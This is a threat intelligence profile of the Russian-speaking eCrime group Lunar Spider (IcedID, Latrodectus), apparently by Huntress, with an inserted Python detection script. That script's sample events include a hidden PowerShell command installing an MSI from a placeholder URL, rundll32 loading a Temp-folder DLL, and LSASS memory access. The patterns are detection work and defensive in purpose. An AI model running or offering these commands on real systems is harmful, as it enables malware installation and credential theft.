Threat Actor Profile

Lunar Spider

Lunar Spider is a formidable Russian-speaking eCrime group, active since at least 2017, that operates as a financially motivated collective specializing in malware development and initial access brokerage. Most notably, the group created and deployed the IcedID (also known as BokBot) banking trojan, the Latrodectus downloader, and the Lotus loader family. Known for its adaptability, Lunar Spider has evolved from banking fraud operations to equipping ransomware affiliates, exploiting stolen credentials and deploying advanced post-exploitation frameworks such as Brute Ratel and Cobalt Strike. The group is notorious for how swiftly it progresses from phishing campaigns to delivering access to high-value criminal partners, targeting vulnerable SMBs and enterprises alike.


Country of Origin

Lunar Spider operates out of the Russian Federation. Its known associations with other Russian-speaking threat actor groups and attribution by multiple vendors reinforce this geographic connection.

Members

The group functions as a decentralized criminal consortium. It includes developers responsible for malware, distribution affiliates utilizing phishing and malvertising, and infrastructure handlers. Exact membership size remains unknown, but it is clear that Lunar Spider relies on partners aligned under an initial access broker (IAB) service model.

Leadership

Lunar Spider’s leadership includes notable figures tied to eCrime organizations. Open-source reporting and U.S. court documentation link Vyacheslav Igorevich Penchukov ("Tank"), a leader of the Jabber Zeus gang, to IcedID development. While Penchukov’s leadership of Lunar Spider as an entity remains debated, his ties to the malware and its operations are well-established.

Lunar Spider TTPs

Tactics

Lunar Spider specializes in monetizing initial access through a blend of credential theft, malware payload delivery, and partnerships enabling ransomware affiliates. They utilize phishing, SEO poisoning, and malvertising to stage their attacks.

Techniques

  • Malvertising and SEO Poisoning – Victims are lured to fake download pages or malicious interstitials disguised as CAPTCHA screens.

  • Phishing – Malicious emails deliver obfuscated JavaScript loaders or archives containing malware payloads.

  • Custom Malware – Use of IcedID/BokBot as a multipurpose loader, Latrodectus for JavaScript delivery, and Lotus loaders for file execution via PowerShell.


Procedures

  • Fake CAPTCHA pages trigger PowerShell scripts to download MSI packages for malware staging.

  • DLL payloads are loaded using living-off-the-land binaries (LOLBins) such as rundll32 and msiexec to evade detection.

  • Victims’ credential stores, including LSASS process memory and browser credential databases, are scraped for sensitive information.
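The three procedures above map directly onto process telemetry a defender already collects. The following is an added example, not Huntress code or anything from the profile's sources: it runs three detection rules over constructed Sysmon-style process creation (event 1) and process access (event 10) records. The field names, rule names, the LSASS allowlist and every sample path or URL are assumptions made for illustration, not real indicators.

```python
"""Detection logic for the Lunar Spider procedures listed above, run over
constructed Sysmon-style process events. Field names, rule names, the
allowlist and the sample events are assumptions made for this example."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class ProcessEvent:
    event_id: int           # 1 = process creation, 10 = process access (Sysmon numbering)
    image: str              # created process (event 1) or source process (event 10)
    parent_image: str = ""
    command_line: str = ""
    target_image: str = ""  # event 10 only: the process whose memory was opened


# msiexec invoked with a remote package URL (fake CAPTCHA -> PowerShell -> MSI download)
REMOTE_MSI = re.compile(r"msiexec(?:\.exe)?\b.*\bhttps?://", re.IGNORECASE)
# a DLL or MSI executed from a user-writable location by a LOLBin
USER_WRITABLE_PAYLOAD = re.compile(
    r'\\(?:AppData|Temp|Downloads|ProgramData|Public)\\[^\s"]*\.(?:dll|msi)\b',
    re.IGNORECASE)
# processes that legitimately open LSASS on a typical host (assumed allowlist; tune per environment)
LSASS_ALLOWLIST = {"csrss.exe", "wininit.exe", "services.exe", "msmpeng.exe"}
DOWNLOAD_SHELLS = {"powershell.exe", "pwsh.exe", "msiexec.exe"}
LOLBINS = {"rundll32.exe", "msiexec.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: ProcessEvent) -> Optional[str]:
    """Return the name of the first rule the event matches, or None."""
    image = basename(ev.image)
    if ev.event_id == 1:
        if image in DOWNLOAD_SHELLS and REMOTE_MSI.search(ev.command_line):
            return "remote_msi_install"
        if image in LOLBINS and USER_WRITABLE_PAYLOAD.search(ev.command_line):
            return "lolbin_user_writable_payload"
    elif ev.event_id == 10:
        if basename(ev.target_image) == "lsass.exe" and image not in LSASS_ALLOWLIST:
            return "lsass_memory_access"
    return None


def scan(events: List[ProcessEvent]) -> List[Tuple[int, str]]:
    """Return (event index, rule name) for every event that matches a rule."""
    hits = []
    for idx, ev in enumerate(events):
        rule = classify(ev)
        if rule:
            hits.append((idx, rule))
    return hits


# Constructed sample events; paths, hosts and file names are illustrative, not real IoCs.
SAMPLE_EVENTS = [
    ProcessEvent(1, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\explorer.exe",
                 'powershell.exe -w hidden -c "msiexec /i https://example.invalid/captcha/update.msi /qn"'),
    ProcessEvent(1, r"C:\Windows\System32\rundll32.exe", r"C:\Windows\System32\msiexec.exe",
                 r"rundll32.exe C:\Users\alice\AppData\Local\Temp\abc.dll,DllMain"),
    ProcessEvent(1, r"C:\Windows\System32\msiexec.exe", r"C:\Windows\explorer.exe",
                 r'msiexec /i "C:\Program Files\Vendor\setup.msi" /qn'),      # benign local install
    ProcessEvent(10, r"C:\Windows\System32\rundll32.exe",
                 target_image=r"C:\Windows\System32\lsass.exe"),
    ProcessEvent(10, r"C:\Windows\System32\csrss.exe",
                 target_image=r"C:\Windows\System32\lsass.exe"),              # allowlisted
]

if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The benign local install and the allowlisted LSASS reader are included so the rules can be checked for false positives as well as true positives; in production the LSASS allowlist should be built from the environment's own EDR and backup agents rather than the assumed set above.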


Notable Cyberattacks

  1. 2024 Fake CAPTCHA Campaign – Leveraged SEO poisoning to deploy the Lotus loader and Brute Ratel artifacts.

  2. Multi-Month Intrusion (2025) – Beginning with phishing, this campaign delivered Latrodectus and facilitated Cobalt Strike deployment for credential harvesting and exfiltration.

Law Enforcement & Arrests

Operation Endgame, conducted in May 2024, dealt a significant blow to Lunar Spider by disrupting IcedID infrastructure, seizing servers, and arresting key operators. However, Lunar Spider quickly rebounded, proving their resilience. Penchukov’s guilty plea in 2024 further highlighted leadership ties to IcedID operations.


How to Defend Against Lunar Spider

  1. Browser Controls – Enforce DNS filtering and block access to third-party ad domains.

  2. Email Security – Strip macros and use advanced link rewriting to mitigate phishing links.

  3. PowerShell Hardening – Implement Constrained Language Mode and AMSI integration.

  4. EDR and Memory Scanning – Detect and block Brute Ratel/Cobalt Strike activity.

  5. Identity Security – Enforce MFA and disable legacy protocols.

Huntress solutions help protect organizations by exposing hidden persistence, identifying banking trojan activity, and mitigating Lunar Spider threats with 24/7 human-led threat hunting.
